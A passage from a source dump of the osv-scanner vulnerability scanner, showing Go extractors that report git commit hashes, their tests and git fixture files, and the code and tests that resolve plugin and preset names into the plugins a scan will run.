"REPORT", "url": "https://github.com/servo/rust-smallvec/issues/252" } ] } ], "groups": [ { "ids": [ "GHSA-43w2-9j62-hq99", "RUSTSEC-2021-0003" ] } ] } ] } ] } ================================================ FILE: internal/scalibrextract/language/osv/osvscannerjson/testdata/not-json.txt ================================================ this is not valid json! (I think) ================================================ FILE: internal/scalibrextract/language/osv/osvscannerjson/testdata/one-package-commit.json ================================================ { "results": [ { "source": { "path": "/path/to/Gemfile.lock", "type": "lockfile" }, "packages": [ { "package": { "commit": "9a6bd55c9d0722cb101fe85a3b22d89e4ff4fe52" }, "vulnerabilities": [], "groups": [] } ] } ] } ================================================ FILE: internal/scalibrextract/language/osv/osvscannerjson/testdata/one-package.json ================================================ { "results": [ { "source": { "path": "/path/to/Gemfile.lock", "type": "lockfile" }, "packages": [ { "package": { "name": "activesupport", "version": "7.0.7", "ecosystem": "RubyGems" }, "vulnerabilities": [], "groups": [] } ] } ] } ================================================ FILE: internal/scalibrextract/vcs/gitcommitdirect/extractor.go ================================================ // Package gitcommitdirect provides an dummy extractor that returns a preset list of commits package gitcommitdirect import ( "context" "github.com/google/osv-scalibr/extractor" "github.com/google/osv-scalibr/extractor/standalone" "github.com/google/osv-scalibr/inventory" "github.com/google/osv-scalibr/plugin" ) const ( // Name is the unique name of this extractor. Name = "vcs/gitcommitdirect" ) // Extractor extracts git repository hashes including submodule hashes. 
// In this package nothing is read from a repository: Extract turns each commit
// string passed to New into a package carrying only that commit, and it always
// returns a nil error.
type Extractor struct {
	// commits holds the preset commit strings handed to New. This file stores and
	// emits them as given; it does not check that they look like commit hashes.
	commits []string
}

// New returns a new instance of the extractor that will report the given commits.
func New(commits []string) standalone.Extractor {
	return &Extractor{
		commits: commits,
	}
}

// Name of the extractor.
func (e *Extractor) Name() string { return Name }

// Version of the extractor.
func (e *Extractor) Version() int { return 0 }

// Requirements of the extractor. The returned capabilities are empty.
func (e *Extractor) Requirements() *plugin.Capabilities { return &plugin.Capabilities{} }

// Extract returns one package per preset commit, each with only SourceCode.Commit
// set. Both arguments are ignored and the returned error is always nil.
func (e *Extractor) Extract(_ context.Context, _ *standalone.ScanInput) (inventory.Inventory, error) {
	// Capacity is known up front, so allocate once.
	pkgs := make([]*extractor.Package, 0, len(e.commits))
	for _, commit := range e.commits {
		pkgs = append(pkgs, &extractor.Package{
			SourceCode: &extractor.SourceCodeIdentifier{Commit: commit},
		})
	}

	return inventory.Inventory{
		Packages: pkgs,
	}, nil
}

// Compile-time check that *Extractor satisfies standalone.Extractor.
var _ standalone.Extractor = &Extractor{}

================================================ FILE: internal/scalibrextract/vcs/gitrepo/extractor.go ================================================
// Package gitrepo provides an extractor for git repositories and submodules.
package gitrepo

import (
	"context"
	"path"
	"path/filepath"

	"github.com/go-git/go-git/v5"
	cpb "github.com/google/osv-scalibr/binary/proto/config_go_proto"
	"github.com/google/osv-scalibr/extractor"
	"github.com/google/osv-scalibr/extractor/filesystem"
	"github.com/google/osv-scalibr/inventory"
	"github.com/google/osv-scalibr/plugin"
	"github.com/google/osv-scalibr/purl"
)

const (
	// Name is the unique name of this extractor.
	Name = "vcs/gitrepo"
)

// Extractor extracts git repository hashes including submodule hashes.
// Extract returns an error when the repository cannot be opened or its submodules
// cannot be listed; a HEAD that cannot be resolved (for example in a repository
// with no commits) is skipped without an error.
type Extractor struct{}

// getCommitSHA returns the hash that HEAD of repo points at, as a string.
// Any error from resolving HEAD is passed back to the caller.
func getCommitSHA(repo *git.Repository) (string, error) {
	ref, err := repo.Head()
	if err == nil {
		return ref.Hash().String(), nil
	}

	return "", err
}

// getSubmodules collects the status of every submodule of repo's worktree.
//
// Failing to obtain the worktree or the submodule list is returned as an error.
// A submodule whose status cannot be read is skipped silently, so the result
// can be incomplete without any error being reported.
func getSubmodules(repo *git.Repository) (submodules []*git.SubmoduleStatus, err error) {
	wt, err := repo.Worktree()
	if err != nil {
		return nil, err
	}

	mods, err := wt.Submodules()
	if err != nil {
		return nil, err
	}

	for _, mod := range mods {
		// Best effort: only submodules with a readable status are kept.
		if st, statusErr := mod.Status(); statusErr == nil {
			submodules = append(submodules, st)
		}
	}

	return submodules, nil
}

// createCommitQueryInventory builds a package that is identified only by a
// commit hash, located at the given path.
func createCommitQueryInventory(commit string, location string) *extractor.Package {
	pkg := &extractor.Package{Location: extractor.LocationFromPath(location)}
	pkg.SourceCode = &extractor.SourceCodeIdentifier{Commit: commit}

	return pkg
}

// New returns a new instance of the extractor. The plugin config is not used.
func New(_ *cpb.PluginConfig) (filesystem.Extractor, error) {
	return &Extractor{}, nil
}

// Name of the extractor.
func (e *Extractor) Name() string {
	return Name
}

// Version of the extractor.
func (e *Extractor) Version() int {
	return 0
}

// Requirements of the extractor: it has to be offered directories, not just files.
func (e *Extractor) Requirements() *plugin.Capabilities {
	caps := plugin.Capabilities{ExtractFromDirs: true}

	return &caps
}

// FileRequired reports whether the entry is a directory named ".git".
func (e *Extractor) FileRequired(fapi filesystem.FileAPI) bool {
	// Cheap name check first; Stat costs performance and only runs on a match.
	if name := filepath.Base(fapi.Path()); name != ".git" {
		return false
	}

	info, err := fapi.Stat()

	return err == nil && info.IsDir()
}

// Extract reports the HEAD commit of the repository that owns the given .git
// directory, followed by one package per submodule whose status could be read.
//
// An error is returned when the repository cannot be opened, and also when the
// submodules cannot be listed; in the second case the inventory gathered so far
// is returned together with the error.
func (e *Extractor) Extract(_ context.Context, input *filesystem.ScanInput) (inventory.Inventory, error) {
	// input.Path is the .git directory itself, while git.PlainOpen wants the
	// directory that contains it, hence filepath.Dir.
	// This opens the path directly and assumes a real filesystem.
	// TODO: Make this support virtual filesystems
	repoDir := path.Join(input.Root, filepath.Dir(input.Path))

	repo, err := git.PlainOpen(repoDir)
	if err != nil {
		return inventory.Inventory{}, err
	}

	var inv inventory.Inventory

	// Not being able to resolve HEAD is not fatal; it can simply mean the
	// repository has no commits yet.
	if headSHA, headErr := getCommitSHA(repo); headErr == nil {
		inv.Packages = append(inv.Packages, createCommitQueryInventory(headSHA, input.Path))
	}

	submodules, err := getSubmodules(repo)
	if err != nil {
		return inv, err
	}

	for _, sub := range submodules {
		// The Expected hash of the status is reported (not Current); presumably this
		// is the commit the parent repository records for the submodule - confirm
		// against go-git.
		// NOTE(review): sub.Path comes from the scanned repository; path.Join cleans
		// the result but does not confine it below input.Path - confirm consumers
		// treat Location as untrusted data.
		subLocation := path.Join(input.Path, sub.Path)
		inv.Packages = append(inv.Packages, createCommitQueryInventory(sub.Expected.String(), subLocation))
	}

	return inv, nil
}

// ToPURL converts an inventory created by this extractor into a PURL.
func (e *Extractor) ToPURL(_ *extractor.Package) *purl.PackageURL { return nil } // Ecosystem returns an empty string as all inventories are commit hashes func (e *Extractor) Ecosystem(_ *extractor.Package) string { return "" } var _ filesystem.Extractor = &Extractor{} ================================================ FILE: internal/scalibrextract/vcs/gitrepo/extractor_test.go ================================================ package gitrepo_test import ( "os" "path" "path/filepath" "testing" "github.com/google/go-cmp/cmp" "github.com/google/go-cmp/cmp/cmpopts" "github.com/google/osv-scalibr/extractor" "github.com/google/osv-scalibr/testing/extracttest" "github.com/google/osv-scanner/v2/internal/scalibrextract/vcs/gitrepo" ) func TestExtractor_Extract(t *testing.T) { t.Parallel() tests := []extracttest.TestTableEntry{ { Name: "Not_a_git_dir", InputConfig: extracttest.ScanInputMockConfig{ Path: "testdata/example-not-git/.git", }, WantErr: extracttest.ContainsErrStr{Str: "repository does not exist"}, }, { Name: "example_git", InputConfig: extracttest.ScanInputMockConfig{ Path: "testdata/example-git/.git", }, WantPackages: []*extractor.Package{ { Location: extractor.LocationFromPath("testdata/example-git/.git"), SourceCode: &extractor.SourceCodeIdentifier{ Commit: "862ac4bd2703b622e85f29f55a2fd8cd6caf8182", }, }, }, }, { Name: "Clean_git_repository_with_no_commits", InputConfig: extracttest.ScanInputMockConfig{ Path: "testdata/example-clean/.git", }, WantPackages: nil, }, } for _, tt := range tests { t.Run(tt.Name, func(t *testing.T) { t.Parallel() extr := gitrepo.Extractor{} parent := filepath.Dir(tt.InputConfig.Path) err := os.Rename(path.Join(parent, "git-hidden"), path.Join(parent, ".git")) if err != nil { t.Errorf("can't find git-hidden folder") } defer func() { err = os.Rename(path.Join(parent, ".git"), path.Join(parent, "git-hidden")) if err != nil { t.Fatalf("failed to restore .git to original git-hidden: %v", err) } }() scanInput := 
extracttest.GenerateScanInputMock(t, tt.InputConfig) defer extracttest.CloseTestScanInput(t, scanInput) got, err := extr.Extract(t.Context(), &scanInput) if diff := cmp.Diff(tt.WantErr, err, cmpopts.EquateErrors()); diff != "" { t.Errorf("%s.Extract(%q) error diff (-want +got):\n%s", extr.Name(), tt.InputConfig.Path, diff) return } if diff := cmp.Diff(tt.WantPackages, got.Packages, cmpopts.SortSlices(extracttest.PackageCmpLess)); diff != "" { t.Errorf("%s.Extract(%q) diff (-want +got):\n%s", extr.Name(), tt.InputConfig.Path, diff) } }) } } ================================================ FILE: internal/scalibrextract/vcs/gitrepo/testdata/example-clean/git-hidden/HEAD ================================================ ref: refs/heads/main ================================================ FILE: internal/scalibrextract/vcs/gitrepo/testdata/example-clean/git-hidden/config ================================================ [core] repositoryformatversion = 0 filemode = true bare = false logallrefupdates = true ================================================ FILE: internal/scalibrextract/vcs/gitrepo/testdata/example-clean/git-hidden/description ================================================ Unnamed repository; edit this file 'description' to name the repository. ================================================ FILE: internal/scalibrextract/vcs/gitrepo/testdata/example-clean/git-hidden/info/exclude ================================================ # git ls-files --others --exclude-from=.git/info/exclude # Lines that start with '#' are comments. 
# For a project mostly in C, the following would be a good set of # exclude patterns (uncomment them if you want to use them): # *.[oa] # *~ ================================================ FILE: internal/scalibrextract/vcs/gitrepo/testdata/example-git/a.txt ================================================ test file ================================================ FILE: internal/scalibrextract/vcs/gitrepo/testdata/example-git/git-hidden/COMMIT_EDITMSG ================================================ Example commit ================================================ FILE: internal/scalibrextract/vcs/gitrepo/testdata/example-git/git-hidden/HEAD ================================================ ref: refs/heads/main ================================================ FILE: internal/scalibrextract/vcs/gitrepo/testdata/example-git/git-hidden/config ================================================ [core] repositoryformatversion = 0 filemode = true bare = false logallrefupdates = true ================================================ FILE: internal/scalibrextract/vcs/gitrepo/testdata/example-git/git-hidden/description ================================================ Unnamed repository; edit this file 'description' to name the repository. ================================================ FILE: internal/scalibrextract/vcs/gitrepo/testdata/example-git/git-hidden/info/exclude ================================================ # git ls-files --others --exclude-from=.git/info/exclude # Lines that start with '#' are comments. 
# For a project mostly in C, the following would be a good set of # exclude patterns (uncomment them if you want to use them): # *.[oa] # *~ ================================================ FILE: internal/scalibrextract/vcs/gitrepo/testdata/example-git/git-hidden/logs/HEAD ================================================ 0000000000000000000000000000000000000000 862ac4bd2703b622e85f29f55a2fd8cd6caf8182 Rex P 1696388400 +1100 commit (initial): Example commit ================================================ FILE: internal/scalibrextract/vcs/gitrepo/testdata/example-git/git-hidden/logs/refs/heads/main ================================================ 0000000000000000000000000000000000000000 862ac4bd2703b622e85f29f55a2fd8cd6caf8182 Rex P 1696388400 +1100 commit (initial): Example commit ================================================ FILE: internal/scalibrextract/vcs/gitrepo/testdata/example-git/git-hidden/refs/heads/main ================================================ 862ac4bd2703b622e85f29f55a2fd8cd6caf8182 ================================================ FILE: internal/scalibrextract/vcs/gitrepo/testdata/example-not-git/a.txt ================================================ test file ================================================ FILE: internal/scalibrextract/vcs/gitrepo/testdata/example-not-git/git-hidden/b.txt ================================================ test file 2 ================================================ FILE: internal/scalibrplugin/__snapshots__/resolve_test.snap ================================================ [TestResolve_AllPresets - 1] baseimage cis/generic-linux/etcpasswdpermissions cpp/conanlock cve/cve-2020-11978 cve/cve-2020-16846 cve/cve-2022-33891 cve/cve-2023-38408 cve/cve-2023-6019 cve/cve-2024-2912 dart/pubspec dotnet/depsjson dotnet/packagesconfig dotnet/packageslockjson erlang/mixlock filesystem/vendored go/binary go/gomod govulncheck/binary haskell/cabal haskell/stacklock java/archive java/gradlelockfile 
java/gradleverificationmetadataxml java/pomxml javascript/bunlock javascript/nodemodules javascript/packagelockjson javascript/pnpmlock javascript/yarnlock license/depsdev os/apk os/dpkg osv/osvscannerjson php/composerlock python/pdmlock python/pipfilelock python/poetrylock python/pylock python/requirements python/uvlock python/wheelegg r/renvlock ruby/gemfilelock rust/cargoauditable rust/cargolock sbom/cdx sbom/spdx transitivedependency/pomxml transitivedependency/requirements vcs/gitrepo vex/os-duplicate/apk vex/os-duplicate/dpkg vulnmatch/osvdev vulnmatch/osvlocal weakcredentials/codeserver weakcredentials/etcshadow weakcredentials/filebrowser weakcredentials/winlocal --- [TestResolve_Annotators_Presets/artifact - 1] baseimage go/binary java/archive javascript/nodemodules os/apk os/dpkg python/wheelegg rust/cargoauditable vex/os-duplicate/apk vex/os-duplicate/dpkg --- [TestResolve_Detectors_Presets/cis - 1] cis/generic-linux/etcpasswdpermissions --- [TestResolve_Detectors_Presets/govulncheck - 1] govulncheck/binary --- [TestResolve_Detectors_Presets/untested - 1] cve/cve-2020-11978 cve/cve-2020-16846 cve/cve-2022-33891 cve/cve-2023-38408 cve/cve-2023-6019 cve/cve-2024-2912 --- [TestResolve_Detectors_Presets/weakcreds - 1] weakcredentials/codeserver weakcredentials/etcshadow weakcredentials/filebrowser weakcredentials/winlocal --- [TestResolve_Enrichers_Presets/artifact - 1] baseimage go/binary java/archive javascript/nodemodules os/apk os/dpkg python/wheelegg rust/cargoauditable vex/os-duplicate/apk vex/os-duplicate/dpkg --- [TestResolve_Enrichers_Presets/licenses - 1] license/depsdev --- [TestResolve_Enrichers_Presets/transitive - 1] --- [TestResolve_Enrichers_Presets/vulns - 1] vulnmatch/osvdev vulnmatch/osvlocal --- [TestResolve_Extractors_Presets/artifact - 1] baseimage go/binary java/archive javascript/nodemodules os/apk os/dpkg python/wheelegg rust/cargoauditable vex/os-duplicate/apk vex/os-duplicate/dpkg --- [TestResolve_Extractors_Presets/directory - 1] 
filesystem/vendored vcs/gitrepo --- [TestResolve_Extractors_Presets/lockfile - 1] cpp/conanlock dart/pubspec dotnet/depsjson dotnet/packagesconfig dotnet/packageslockjson erlang/mixlock go/gomod haskell/cabal haskell/stacklock java/gradlelockfile java/gradleverificationmetadataxml java/pomxml javascript/bunlock javascript/packagelockjson javascript/pnpmlock javascript/yarnlock os/apk os/dpkg osv/osvscannerjson php/composerlock python/pdmlock python/pipfilelock python/poetrylock python/pylock python/requirements python/uvlock r/renvlock ruby/gemfilelock rust/cargolock --- [TestResolve_Extractors_Presets/sbom - 1] sbom/cdx sbom/spdx --- ================================================ FILE: internal/scalibrplugin/presets.go ================================================ package scalibrplugin import ( "fmt" annotatorlist "github.com/google/osv-scalibr/annotator/list" apkanno "github.com/google/osv-scalibr/annotator/osduplicate/apk" dpkganno "github.com/google/osv-scalibr/annotator/osduplicate/dpkg" cpb "github.com/google/osv-scalibr/binary/proto/config_go_proto" detectors "github.com/google/osv-scalibr/detector/list" "github.com/google/osv-scalibr/enricher" "github.com/google/osv-scalibr/enricher/baseimage" "github.com/google/osv-scalibr/enricher/enricherlist" transitivedependencypomxml "github.com/google/osv-scalibr/enricher/transitivedependency/pomxml" transitivedependencyrequirements "github.com/google/osv-scalibr/enricher/transitivedependency/requirements" "github.com/google/osv-scalibr/extractor/filesystem/language/cpp/conanlock" "github.com/google/osv-scalibr/extractor/filesystem/language/dart/pubspec" "github.com/google/osv-scalibr/extractor/filesystem/language/dotnet/depsjson" "github.com/google/osv-scalibr/extractor/filesystem/language/dotnet/packagesconfig" "github.com/google/osv-scalibr/extractor/filesystem/language/dotnet/packageslockjson" "github.com/google/osv-scalibr/extractor/filesystem/language/erlang/mixlock" 
"github.com/google/osv-scalibr/extractor/filesystem/language/golang/gobinary" "github.com/google/osv-scalibr/extractor/filesystem/language/golang/gomod" "github.com/google/osv-scalibr/extractor/filesystem/language/haskell/cabal" "github.com/google/osv-scalibr/extractor/filesystem/language/haskell/stacklock" "github.com/google/osv-scalibr/extractor/filesystem/language/java/archive" "github.com/google/osv-scalibr/extractor/filesystem/language/java/gradlelockfile" "github.com/google/osv-scalibr/extractor/filesystem/language/java/gradleverificationmetadataxml" "github.com/google/osv-scalibr/extractor/filesystem/language/java/pomxml" "github.com/google/osv-scalibr/extractor/filesystem/language/javascript/bunlock" "github.com/google/osv-scalibr/extractor/filesystem/language/javascript/packagelockjson" "github.com/google/osv-scalibr/extractor/filesystem/language/javascript/pnpmlock" "github.com/google/osv-scalibr/extractor/filesystem/language/javascript/yarnlock" "github.com/google/osv-scalibr/extractor/filesystem/language/php/composerlock" "github.com/google/osv-scalibr/extractor/filesystem/language/python/pdmlock" "github.com/google/osv-scalibr/extractor/filesystem/language/python/pipfilelock" "github.com/google/osv-scalibr/extractor/filesystem/language/python/poetrylock" "github.com/google/osv-scalibr/extractor/filesystem/language/python/pylock" "github.com/google/osv-scalibr/extractor/filesystem/language/python/requirements" "github.com/google/osv-scalibr/extractor/filesystem/language/python/uvlock" "github.com/google/osv-scalibr/extractor/filesystem/language/python/wheelegg" "github.com/google/osv-scalibr/extractor/filesystem/language/r/renvlock" "github.com/google/osv-scalibr/extractor/filesystem/language/ruby/gemfilelock" "github.com/google/osv-scalibr/extractor/filesystem/language/rust/cargoauditable" "github.com/google/osv-scalibr/extractor/filesystem/language/rust/cargolock" extractors "github.com/google/osv-scalibr/extractor/filesystem/list" 
"github.com/google/osv-scalibr/extractor/filesystem/os/apk" "github.com/google/osv-scalibr/extractor/filesystem/os/dpkg" "github.com/google/osv-scalibr/extractor/filesystem/sbom/cdx" "github.com/google/osv-scalibr/extractor/filesystem/sbom/spdx" "github.com/google/osv-scanner/v2/internal/datasource" "github.com/google/osv-scanner/v2/internal/depsdev" "github.com/google/osv-scanner/v2/internal/scalibrextract/filesystem/vendored" "github.com/google/osv-scanner/v2/internal/scalibrextract/language/javascript/nodemodules" "github.com/google/osv-scanner/v2/internal/scalibrextract/language/osv/osvscannerjson" "github.com/google/osv-scanner/v2/internal/scalibrextract/vcs/gitrepo" "github.com/google/osv-scanner/v2/internal/version" ) var detectorPresets = map[string]detectors.InitMap{ "cis": detectors.CIS, "govulncheck": detectors.Govulncheck, "untested": detectors.Untested, "weakcreds": detectors.Weakcredentials, } var ExtractorPresets = map[string]extractors.InitMap{ "sbom": { spdx.Name: {spdx.New}, cdx.Name: {cdx.New}, }, "lockfile": { // C conanlock.Name: {conanlock.New}, // Erlang mixlock.Name: {mixlock.New}, // Flutter pubspec.Name: {pubspec.New}, // Go gomod.Name: {gomod.New}, // Java gradlelockfile.Name: {gradlelockfile.New}, gradleverificationmetadataxml.Name: {gradleverificationmetadataxml.New}, pomxml.Name: {pomxml.New}, // Javascript packagelockjson.Name: {packagelockjson.New}, pnpmlock.Name: {pnpmlock.New}, yarnlock.Name: {yarnlock.New}, bunlock.Name: {bunlock.New}, // PHP composerlock.Name: {composerlock.New}, // Python pipfilelock.Name: {pipfilelock.New}, pdmlock.Name: {pdmlock.New}, poetrylock.Name: {poetrylock.New}, pylock.Name: {pylock.New}, requirements.Name: {requirements.New}, uvlock.Name: {uvlock.New}, // R renvlock.Name: {renvlock.New}, // Ruby gemfilelock.Name: {gemfilelock.New}, // Rust cargolock.Name: {cargolock.New}, // NuGet depsjson.Name: {depsjson.New}, packagesconfig.Name: {packagesconfig.New}, packageslockjson.Name: {packageslockjson.New}, // 
// Haskell
		cabal.Name:     {cabal.New},
		stacklock.Name: {stacklock.New},

		osvscannerjson.Name: {osvscannerjson.New},

		// --- OS "lockfiles" ---
		// These have very strict FileRequired paths, so we can safely enable them for source scanning as well.
		// Alpine
		apk.Name: {apk.New},
		// Debian
		dpkg.Name: {dpkg.New},
	},
	"directory": {
		gitrepo.Name:  {gitrepo.New},
		vendored.Name: {vendored.New},
	},
	"artifact": {
		// --- Project artifacts ---
		// Python
		wheelegg.Name: {wheelegg.New},
		// Java
		archive.Name: {archive.New},
		// Go
		gobinary.Name: {gobinary.New},
		// Javascript
		nodemodules.Name: {nodemodules.New},
		// Rust
		cargoauditable.Name: {cargoauditable.New},

		// --- OS packages ---
		// Alpine
		apk.Name: {apk.New},
		// Debian
		dpkg.Name: {dpkg.New},
	},
}

// enricherPresets maps a preset name to the enrichers that the preset enables,
// keyed by plugin name.
//
// Enabling a preset is not a guarantee that its enrichers run: Resolve drops
// any enricher whose required plugins are not enabled as well.
var enricherPresets = map[string]enricherlist.InitMap{
	"artifact": {
		baseimage.Name: {baseImageEnricher},
	},
	"vulns":    enricherlist.VulnMatching,
	"licenses": enricherlist.License,
	"transitive": {
		transitivedependencyrequirements.Name: {transitivedependencyrequirements.New},
		transitivedependencypomxml.Name:       {transitivedependencypomxml.New},
	},
}

// annotatorPresets maps a preset name to the annotators that the preset
// enables, keyed by plugin name.
var annotatorPresets = map[string]annotatorlist.InitMap{
	"artifact": {
		apkanno.Name:  {apkanno.New},
		dpkganno.Name: {dpkganno.New},
	},
}

// baseImageEnricher is the initializer registered for baseimage.Name in the
// "artifact" enricher preset. It builds the base image enricher on top of a
// gRPC insights client created for depsdev.DepsdevAPI.
//
// The plugin config argument is ignored. An error is returned when either the
// client or the enricher cannot be created.
func baseImageEnricher(_ *cpb.PluginConfig) (enricher.Enricher, error) {
	// Creating the grpc client **does not** send any request: it stays in an
	// IDLE state until the first call is made on it. Building it is therefore
	// safe in offline mode too, where the enricher plugin is filtered out.
	client, err := datasource.NewInsightsAlphaClient(depsdev.DepsdevAPI, "osv-scanner_scan/"+version.OSVVersion)
	if err != nil {
		return nil, fmt.Errorf("unable to connect to insights server: %w", err)
	}

	enricherConfig := &baseimage.Config{
		Client: baseimage.NewClientGRPC(client),
	}

	enr, err := baseimage.New(enricherConfig)
	if err != nil {
		return nil, fmt.Errorf("unable to initialize base image enricher: %w", err)
	}

	return enr, nil
}

================================================
FILE: internal/scalibrplugin/resolve.go
================================================
// Package scalibrplugin provides functions related to resolving scalibr plugins
package scalibrplugin

import (
	"fmt"
	"slices"

	cpb "github.com/google/osv-scalibr/binary/proto/config_go_proto"
	"github.com/google/osv-scalibr/enricher"
	"github.com/google/osv-scalibr/plugin"
	"github.com/google/osv-scalibr/plugin/list"
	"github.com/google/osv-scanner/v2/internal/cmdlogger"
	"github.com/google/osv-scanner/v2/internal/scalibrextract/filesystem/vendored"
	"github.com/google/osv-scanner/v2/internal/scalibrextract/language/javascript/nodemodules"
	"github.com/google/osv-scanner/v2/internal/scalibrextract/language/osv/osvscannerjson"
	"github.com/google/osv-scanner/v2/internal/scalibrextract/vcs/gitrepo"
)

// resolveFromName turns one exact plugin name into an initialised plugin.
//
// The name is first looked up through list.FromName. If that fails, the
// plugins that live in this repository (nodemodules, vendored, gitrepo and
// osvscannerjson) are tried. A name that matches none of them is an error.
//
// NOTE(review): the error from list.FromName is discarded, so if that call can
// fail for a reason other than an unknown name, the reason is not reported to
// the caller - confirm against list.FromName.
func resolveFromName(name string, cfg *cpb.PluginConfig) (plugin.Plugin, error) {
	if plug, err := list.FromName(name, cfg); err == nil {
		return plug, nil
	}

	switch name {
	// Javascript
	case nodemodules.Name:
		return nodemodules.New(cfg)
	// Directories
	case vendored.Name:
		return vendored.New(cfg)
	case gitrepo.Name:
		return gitrepo.New(cfg)
	case osvscannerjson.Name:
		return osvscannerjson.New(cfg)
	}

	return nil, fmt.Errorf("not an exact name for a plugin: %q", name)
}

// Resolve returns the plugins selected by the enabled and disabled lists.
//
// Each entry is either a preset name or an exact plugin name. A preset name is
// expanded to every plugin listed under it in the extractor, detector,
// annotator and enricher preset maps; one preset name may match in several of
// those maps. Anything that is not a preset name is treated as a plugin name.
//
// The enabled list is applied first and the disabled list second, so a plugin
// or preset that appears in both ends up disabled. Empty names are ignored.
//
// Resolve does not return an error. A name that cannot be resolved is logged
// with cmdlogger.Errorf and left out of the result, and an enricher whose
// required plugins are not all enabled is left out without any log line. A
// misspelt or unavailable plugin name therefore narrows what gets scanned
// rather than stopping the run; callers that need a strict selection have to
// compare the returned plugins with the names they asked for.
//
// The result is built by ranging over a map, so its order is unspecified.
func Resolve(enabledPlugins []string, disabledPlugins []string, cfg *cpb.PluginConfig) []plugin.Plugin {
	// status records, per plugin name, whether the plugin is currently wanted.
	status := make(map[string]bool)

	for pass, requested := range [][]string{enabledPlugins, disabledPlugins} {
		// the first pass carries the enabled names, the second the disabled ones
		wanted := pass == 0

		for _, pluginOrPreset := range requested {
			matchedPreset := false

			if members, found := ExtractorPresets[pluginOrPreset]; found {
				matchedPreset = true

				for member := range members {
					status[member] = wanted
				}
			}

			if members, found := detectorPresets[pluginOrPreset]; found {
				matchedPreset = true

				for member := range members {
					status[member] = wanted
				}
			}

			if members, found := annotatorPresets[pluginOrPreset]; found {
				matchedPreset = true

				for member := range members {
					status[member] = wanted
				}
			}

			if members, found := enricherPresets[pluginOrPreset]; found {
				matchedPreset = true

				for member := range members {
					status[member] = wanted
				}
			}

			if matchedPreset {
				continue
			}

			// not a preset, so the entry is taken to be a plugin name
			status[pluginOrPreset] = wanted
		}
	}

	resolved := make([]plugin.Plugin, 0, len(status))

	for name, wanted := range status {
		if name == "" || !wanted {
			continue
		}

		plug, err := resolveFromName(name, cfg)
		if err == nil {
			resolved = append(resolved, plug)

			continue
		}

		cmdlogger.Errorf("%s", err)

		// record the plugin as disabled, in case another plugin lists it
		// as one of its required plugins
		status[name] = false
	}

	return filterPluginsMissingRequiredPlugins(status, resolved)
}

// filterPluginsMissingRequiredPlugins returns the loaded plugins without the
// enrichers whose requirements are not met.
//
// pluginStatues maps a plugin name to whether that plugin is enabled; a name
// that is absent from the map counts as not enabled. Plugins that are not
// enrichers are always kept. Nothing is logged for an enricher that is
// dropped here.
func filterPluginsMissingRequiredPlugins(pluginStatues map[string]bool, loaded []plugin.Plugin) []plugin.Plugin {
	kept := make([]plugin.Plugin, 0, len(loaded))

	for _, candidate := range loaded {
		if en, isEnricher := candidate.(enricher.Enricher); isEnricher {
			// a required plugin whose status is false (or missing) is not
			// going to run, so the enricher's requirements are not met
			requirementMissing := slices.ContainsFunc(en.RequiredPlugins(), func(required string) bool {
				return !pluginStatues[required]
			})

			if requirementMissing {
				continue
			}
		}

		kept = append(kept, candidate)
	}

	return kept
}

================================================
FILE: internal/scalibrplugin/resolve_test.go
================================================
package scalibrplugin_test

import (
	"slices"
	"strings"
	"testing"

	"github.com/google/go-cmp/cmp"
	apkanno "github.com/google/osv-scalibr/annotator/osduplicate/apk"
	dpkganno "github.com/google/osv-scalibr/annotator/osduplicate/dpkg"
	cpb "github.com/google/osv-scalibr/binary/proto/config_go_proto"
	"github.com/google/osv-scalibr/detector/cis/generic_linux/etcpasswdpermissions"
	"github.com/google/osv-scalibr/detector/govulncheck/binary"
	"github.com/google/osv-scalibr/detector/weakcredentials/codeserver"
	"github.com/google/osv-scalibr/detector/weakcredentials/etcshadow"
	"github.com/google/osv-scalibr/detector/weakcredentials/filebrowser"
	"github.com/google/osv-scalibr/detector/weakcredentials/winlocal"
	"github.com/google/osv-scalibr/enricher/baseimage"
	transitivedependencypomxml "github.com/google/osv-scalibr/enricher/transitivedependency/pomxml"
	transitivedependencyrequirements "github.com/google/osv-scalibr/enricher/transitivedependency/requirements"
	"github.com/google/osv-scalibr/extractor/filesystem/language/dotnet/packageslockjson"
	"github.com/google/osv-scalibr/extractor/filesystem/language/golang/gobinary"
	"github.com/google/osv-scalibr/extractor/filesystem/language/java/archive"
	"github.com/google/osv-scalibr/extractor/filesystem/language/java/pomxml"
	"github.com/google/osv-scalibr/extractor/filesystem/language/php/composerlock"
	"github.com/google/osv-scalibr/extractor/filesystem/language/python/requirements"
	"github.com/google/osv-scalibr/extractor/filesystem/language/python/wheelegg"
	"github.com/google/osv-scalibr/extractor/filesystem/language/rust/cargoauditable"
	chromeextensions "github.com/google/osv-scalibr/extractor/filesystem/misc/chrome/extensions"
	"github.com/google/osv-scalibr/extractor/filesystem/os/apk"
	"github.com/google/osv-scalibr/extractor/filesystem/os/dpkg"
	"github.com/google/osv-scalibr/extractor/filesystem/sbom/cdx"
	"github.com/google/osv-scalibr/extractor/filesystem/sbom/spdx"
	"github.com/google/osv-scanner/v2/internal/scalibrextract/filesystem/vendored"
	"github.com/google/osv-scanner/v2/internal/scalibrextract/language/javascript/nodemodules"
	"github.com/google/osv-scanner/v2/internal/scalibrextract/vcs/gitrepo"
	"github.com/google/osv-scanner/v2/internal/scalibrplugin"
	"github.com/google/osv-scanner/v2/internal/testutility"
)

// TestResolve checks Resolve with extractor and detector names and presets
// mixed in one call. The cases pin that a name listed as both enabled and
// disabled is left out, that a preset name expands to its members, and that
// empty or unknown names produce no plugins.
func TestResolve(t *testing.T) {
	t.Parallel()

	type args struct {
		enabled  []string
		disabled []string
	}

	tests := []struct {
		name string
		args args
		want []string
	}{
		{
			name: "nothing_enabled_or_disabled",
			args: args{
				enabled:  nil,
				disabled: nil,
			},
			want: []string{},
		},
		{
			name: "empty_strings_are_ignored",
			args: args{
				enabled:  []string{""},
				disabled: []string{""},
			},
			want: []string{},
		},
		//
		{
			name: "one_extractor_and_one_detector_enabled_and_nothing_disabled",
			args: args{
				enabled:  []string{composerlock.Name, etcshadow.Name},
				disabled: nil,
			},
			want: []string{composerlock.Name, etcshadow.Name},
		},
		{
			name: "one_extractor_and_one_detector_enabled_and_different_detector_disabled",
			args: args{
				enabled:  []string{composerlock.Name, etcshadow.Name},
				disabled: []string{binary.Name},
			},
			want: []string{composerlock.Name, etcshadow.Name},
		},
		{
			name: "one_extractor_and_one_detector_enabled_and_different_extractor_disabled",
			args: args{
				enabled:  []string{composerlock.Name, etcshadow.Name},
				disabled: []string{binary.Name, chromeextensions.Name},
			},
			want: []string{composerlock.Name, etcshadow.Name},
		},
		{
